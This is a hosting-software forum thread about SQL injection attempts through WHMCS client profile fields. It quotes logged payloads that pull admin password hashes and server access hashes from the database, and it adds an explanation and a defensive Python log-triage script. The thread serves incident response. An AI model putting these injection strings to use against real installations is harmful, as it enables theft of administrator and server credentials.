Spam / hacker registration ??


oldlock

I just had a user register, and immediately received a details change request for the following:

 

First Name: 'snsdjn' to 'hacked'
Last Name: 'sjnsdjn' to 'hacked'
Company Name: 'jsdn' to 'hacked'
Address 1: 'sndjsdn' to 'AES_ENCRYPT(1,1), address1= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) FROM tbladmins)'
Address 2: 'jsdnsd' to 'AES_ENCRYPT(1,1), address2= (SELECT GROUP_CONCAT(password SEPARATOR 0x0d) FROM tbladmins)'
City: 'dnsdj' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(type,0x3a,ipaddress,0x3a,username,0x0d,accesshash SEPARATOR 0x0d) FROM tblservers)'
State: 'Victoria' to 'AES_ENCRYPT(1,1), state= (SELECT GROUP_CONCAT(id,0x3a,servertype,0x3a,paytype,0x3a,configoption1 SEPARATOR 0x0d) FROM tblproducts)'
Postcode: '38434' to 'hacked'
Country: 'AU' to 'US'
Phone Number: '83434' to '1'
Default Payment Method: '' to ''

 

It all looked very suspect to me, so I deleted it at once. Should I be concerned about any possible damage?


I was running 5.3.6, I'm now up to date. Research subsequent to my post here suggests I should be OK as it's an old exploit.

 

You should be fine. This version is patched against the vulnerability (they can try it but it won't work).

 

I received the same registration. My version is 5.1.13.

 

You are also fine. This was patched in 5.1.10 but I recommend you upgrade as other security issues have since been addressed.

 

Yours could well be hacked... you need to upgrade ASAP if it is clean.

 

He is patched against this specific vulnerability but it is recommended he upgrade.

 

Details about the AES_ENCRYPT issue can be found here: http://blog.whmcs.com/?t=79527


Thanks for sharing. That's a really nice and informative reply.


  • 7 months later...

Ok People!...

 

I upgraded yesterday to the latest version available (5.3.12).

 

And here's the thing: before the upgrade I was never attacked.

 

Here is the log content:

 

19/03/2015 09:10	Created Client asal daftar - User ID: 44	System	192.185.82.116
19/03/2015 09:10	Email Sent to asal daftar (Bienvenido(a) a Slash Web Host) - User ID: 44	System	192.185.82.116
19/03/2015 09:10	New Order Placed - Order ID: 67 - User ID: 44	System	192.185.82.116
19/03/2015 09:10	Created Invoice - Invoice ID: 20100098	System	192.185.82.116
19/03/2015 09:10	Email Sent to asal daftar (Factura emitida) - User ID: 44	System	192.185.82.116
19/03/2015 09:10	Email Sent to asal daftar (Confirmación de pedido) - User ID: 44	System	192.185.82.116
19/03/2015 09:10	Client Profile Modified - Address 1: 'cyberteam' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)', Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)', City: 'cyberteam' to 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)', State: 'saint' to 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)', Default Payment Method: '' to '', Tipo de documento: 'Google' to '', Numero de documento: 'Google' to '' - User ID: 44	Client	192.185.82.116
19/03/2015 09:10	Client Profile Modified - Address 1: 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' to 'cyberteam', Address 2: 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' to 'cyberteam', City: 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)' to 'cyberteam', State: 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)' to 'saint', Default Payment Method: '' to '' - User ID: 44	Client	192.185.82.116
19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' - User ID: 44	Client	192.185.82.116
19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' - User ID: 44	Client	192.185.82.116
19/03/2015 09:10	Client Profile Modified - Default Payment Method: '' to '' - User ID: 44	Client	192.185.82.116

 

So far I haven't noticed anything weird in the server's behaviour, but I don't know if there is something specific I should be looking for.

 

Any suggestions?

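The payload in both posts has the same shape: it closes the AES_ENCRYPT() call that the profile-update query wraps around the submitted value and appends a second column assignment whose value is a subquery, so on an unpatched install the subquery result (admin usernames, emails and password hashes from tbladmins, server type, IP, username and access hash from tblservers, product data from tblproducts) is written into the client's own address fields, where the attacker reads it back from the client area. The log quoted above also records the attacker immediately changing the fields back. That revert is the check a practitioner wants: if the 'from' value in the reverting change is the payload text itself, the server stored the literal string and the SQL never ran; if it is anything else, that value is what the subquery returned and the install should be treated as compromised. The triage script below is an added example, not WHMCS code and not anything posted in the thread. It assumes activity-log lines exported in the tab-separated shape quoted above (timestamp, message, actor, IP), and every function name is mine. The sample lines are constructed: user 44 mirrors the quoted lines, and user 45 is invented to show what a successful injection would leave behind.

```python
"""Triage WHMCS activity-log lines for the AES_ENCRYPT profile-update injection.

Added example; not WHMCS code. Assumes tab-separated lines of the form
    <timestamp>\t<message>\t<actor>\t<ip>
as quoted in the thread. Function and variable names are the author's own.
"""
import re
from dataclasses import dataclass

# Constructed sample, modelled on the activity log quoted in the thread.
# User 44: payload stored as a literal and then reverted (patched install).
# User 45: invented to show a successful injection, where the revert's
# 'from' value is the subquery result rather than the payload text.
SAMPLE_LOG = "\n".join([
    "19/03/2015 09:10\tCreated Client asal daftar - User ID: 44\tSystem\t192.185.82.116",
    "19/03/2015 09:10\tClient Profile Modified - Address 1: 'cyberteam' to "
    "'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)', "
    "Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)', "
    "City: 'cyberteam' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email "
    "SEPARATOR 0x0d) FROM tbladmins)', Default Payment Method: '' to '' - User ID: 44\tClient\t192.185.82.116",
    "19/03/2015 09:10\tClient Profile Modified - Address 1: "
    "'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' to 'cyberteam', "
    "Address 2: 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' to 'cyberteam', "
    "City: 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email SEPARATOR 0x0d) "
    "FROM tbladmins)' to 'cyberteam' - User ID: 44\tClient\t192.185.82.116",
    "19/03/2015 09:12\tClient Profile Modified - Address 1: 'cyberteam' to "
    "'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' - User ID: 45\tClient\t192.0.2.10",
    "19/03/2015 09:12\tClient Profile Modified - Address 1: 'cpanel' to 'cyberteam' - User ID: 45\tClient\t192.0.2.10",
])

# "<Field>: '<old>' to '<new>'" pairs; the payloads never contain a single quote.
FIELD_CHANGE = re.compile(r"(?P<field>[^,:']+?): '(?P<old>[^']*)' to '(?P<new>[^']*)'")
# Closed AES_ENCRYPT() call, extra column assignment, subquery against one table.
INJECTION = re.compile(
    r"^AES_ENCRYPT\([^)]*\)\s*,\s*(?P<column>\w+)\s*=\s*"
    r"\(\s*SELECT\s+(?P<expr>.+?)\s+FROM\s+(?P<table>\w+)\s*\)\s*$",
    re.IGNORECASE,
)
USER_ID = re.compile(r"User ID:\s*(\d+)")


@dataclass
class Entry:
    ts: str
    message: str
    actor: str
    ip: str


def parse_line(line):
    """Split one exported log line into its four columns, or None if malformed."""
    parts = line.rstrip("\n").split("\t")
    return Entry(*parts) if len(parts) == 4 else None


def profile_changes(message):
    """Yield (field, old, new) from a 'Client Profile Modified - ...' message."""
    body = message.split(" - ", 1)[1] if " - " in message else message
    for m in FIELD_CHANGE.finditer(body):
        yield m["field"].strip(), m["old"], m["new"]


def triage(log_text):
    """Map (user_id, field) -> finding for every AES_ENCRYPT attempt.

    outcome is 'pending' until the field changes again, then 'not executed'
    if the old value is the payload text itself (literal was stored), or
    'review' if the field held something else (the subquery's result).
    """
    findings = {}
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None or not e.message.startswith("Client Profile Modified"):
            continue
        uid = USER_ID.search(e.message)
        uid = uid.group(1) if uid else "?"
        for fld, old, new in profile_changes(e.message):
            key = (uid, fld)
            inj = INJECTION.match(new)
            if inj:
                findings[key] = {"ts": e.ts, "ip": e.ip, "column": inj["column"],
                                 "table": inj["table"].lower(), "payload": new,
                                 "outcome": "pending"}
            elif key in findings and findings[key]["outcome"] == "pending":
                f = findings[key]
                f["outcome"] = "not executed" if old == f["payload"] else "review"
                f["stored_value"] = old
    return findings


def targeted_tables(findings):
    """Sorted list of tables the attempts tried to read; tells you what to rotate."""
    return sorted({f["table"] for f in findings.values()})


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for (uid, fld), f in result.items():
        extra = f" (field held {f['stored_value']!r})" if "stored_value" in f else ""
        print(f"user {uid:>3} {fld:<10} -> {f['column']} from {f['table']}: {f['outcome']}{extra}")
    print("tables targeted:", ", ".join(targeted_tables(result)))
```

Run against a real export, a 'review' outcome for any field means the stored value must be examined and, whatever it contains, the credentials in the targeted tables (admin passwords, server access hashes and passwords) rotated; a 'pending' outcome with no later change, as in the first post where the client was deleted, leaves you without the revert to compare, so check the client record itself before deleting it next time.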
